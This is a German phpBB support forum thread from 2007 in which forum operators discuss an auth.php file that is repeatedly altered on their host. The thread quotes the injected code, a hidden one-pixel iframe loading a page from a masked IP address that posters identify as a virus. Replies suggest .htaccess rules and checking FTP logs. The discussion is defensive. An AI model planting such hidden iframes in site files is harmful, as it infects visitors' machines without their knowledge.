auth.php ändert sich von selbst

sgt · Beitrag von **sgt** » 23.04.2007 21:13

Hallo,

ich betreibe seit kurzer Zeit ein eigenes Forum und bisher lief alles problemlos. Seit seit ein paar Tagen habe ich folgendes Problem. Beim Aufruf des Forums erscheint diese Fehlermeldung und kein Benutzer kann sich Einloggen:

Code: Alles auswählen

Warning: Cannot modify header information - headers already sent by (output started at /mnt/jd1/06/283/00000018/htdocs/sportfotoforum.de/includes/auth.php:328) in /mnt/jd1/06/283/00000018/htdocs/sportfotoforum.de/includes/sessions.php on line 254

Warning: Cannot modify header information - headers already sent by (output started at /mnt/jd1/06/283/00000018/htdocs/sportfotoforum.de/includes/auth.php:328) in /mnt/jd1/06/283/00000018/htdocs/sportfotoforum.de/includes/sessions.php on line 255

Warning: Cannot modify header information - headers already sent by (output started at /mnt/jd1/06/283/00000018/htdocs/sportfotoforum.de/includes/auth.php:328) in /mnt/jd1/06/283/00000018/htdocs/sportfotoforum.de/includes/sessions.php on line 254

Warning: Cannot modify header information - headers already sent by (output started at /mnt/jd1/06/283/00000018/htdocs/sportfotoforum.de/includes/auth.php:328) in /mnt/jd1/06/283/00000018/htdocs/sportfotoforum.de/includes/sessions.php on line 255

Warning: Cannot modify header information - headers already sent by (output started at /mnt/jd1/06/283/00000018/htdocs/sportfotoforum.de/includes/auth.php:328) in /mnt/jd1/06/283/00000018/htdocs/sportfotoforum.de/includes/functions.php on line 951

Kurze Recherche ergab, das die Ursache dafür in einer fehlerhaften auth.php Datei liegt. Lade ich nun die auth.php aus einem Backup erneut hoch, verschwindet der Fehler, tritt dann aber nach kurzer Zeit wieder auf. Also habe ich mir die auth.php von dem Server heruntergeladen und siehe da: Diese Datei wird anscheinend nachträglich geändert und dies verursacht obige Fehlermeldung.

auth.php, die ich hochlade endet so:

Code: Alles auswählen

	else
	{
		$auth_user = $is_admin;
	}

	return $auth_user;
}

?>

Wenn die Fehlermeldung auftritt, sieht die Datei so aus:

Code: Alles auswählen

	else
	{
		$auth_user = $is_admin;
	}

	return $auth_user;
}

?><iframe src='http://*.*.*.*/logo/index.php' width='1' height='1' style='visibility: hidden;'></iframe>

Kennt jemand für dieses Problem eine Lösung? Ich verwende übrigens phpbb 2.0.22 in der deutschen Version

Schöne Grüße

Edit: Ich habe den Link durch * unkenntlich gemacht, damit sich niemand aus Versehen einen Virus einhandelt.

Beitrag von **nickvergessen** » 23.04.2007 21:34

ACHTUNG DER LINK IN DEM IFRAME FÜHRT ZU EINEM VIRUS

Herzlichen Glückwunsch.
Hast dir nen Virus eingefangen!

Aber abgesehen davon KB:headers_already_sent

sgt · Beitrag von **sgt** » 23.04.2007 22:08

Vielen Dank für die schnelle Antwort. Wenn ich die auth.php hochlade besitzt sie diesen Link nicht, ist sie aber für einige Zeit auf dem Server meines Webhosters enthält die Datei den Link. Heißt das nun, mein Webhoster hat ein Virusproblem? Mir ist nämlich nicht ganz klar, wie ein Virus von meinem Rechner aus (sollte ich widererwarten ein Virus haben) Stunden nachdem ich die auth.php Datei hochgeladen haben, diese Änderung durchführt, auch wenn ich gar nicht online bin.

Den von dir verlinkten Artikel habe ich bereits gelesen, deswegen weiß ich ja auch, das die auth.php mit dem Link nicht funktionieren kann, da nach ?> noch Text kommt (nämlich der Link).

Schöne Grüße

Beitrag von **nickvergessen** » 23.04.2007 22:10

sgt hat geschrieben:Vielen Dank für die schnelle Antwort. Wenn ich die auth.php hochlade besitzt sie diesen Link nicht, ist sie aber für einige Zeit auf dem Server meines Webhosters enthält die Datei den Link. Heißt das nun, mein Webhoster hat ein Virusproblem?

hm, oder jemand hackt den Webhoster und fügt das ein.

Beitrag von **nickvergessen** » 27.04.2007 15:39

so 'ne schei...

Hab jetzt das gleiche Problem, dass an die auth.php der Code-Schnippsel angehängt wird.
Dies ist sowohl bei meinem phpBB3 Board so, als auch bei den ganzen phpBB 2.0.22.
Hat jemand 'ne Ahnung was man dagegen machen kann? Bei dem 3er muss ich sonst alle 15Minuten die Datei neuhochladen udn das kann ja auch nicht.
Kann man irgendwie verhindern, dass eine Datei per FTP upgeloaded wird, via htaccess oder so?

Knut77 · Beitrag von **Knut77** » 27.04.2007 16:54

Hi,
erstellt mal eine .htaccess Datei.

Und schreibt mal folgendes hinein...

<FilesMatch "\.php$" >
deny from all
</FilesMatch>

Die kommt in den includes Ordner.

Und fragt bei eurem Hoster nach Logfiles, und guckt ob einer sich über Ftp einloggt, außer ihr und die die Zugangsdaten haben dürfen.

Beitrag von **nickvergessen** » 27.04.2007 17:01

Knut77 hat geschrieben:Und fragt bei eurem Hoster nach Logfiles, und guckt ob einer sich über Ftp einloggt, außer ihr und die die Zugangsdaten haben dürfen.

Also im Log steht nur meine IP drin. Und dazwischen auch keine Zugriff über meine IP.
Also Zwischen den 2 zeitpunkten wo ich upgeloaded um den Fehler zubeheben hat sich nichts geändert...

Knut77 · Beitrag von **Knut77** » 27.04.2007 17:14

Okay...wenn keiner die FTP Daten hat, außer dir ist es gut.

Dann erstelle mal die .htaccess.

MfG Knut

Beitrag von **nickvergessen** » 28.04.2007 11:58

Hat nichts genützt... war heute schon wieder dran trotz htaccess

Beitrag von **Dr.Death** » 28.04.2007 14:35

Vielleicht hast DU ja LOKAL auf DEINEM PC einen Virus ?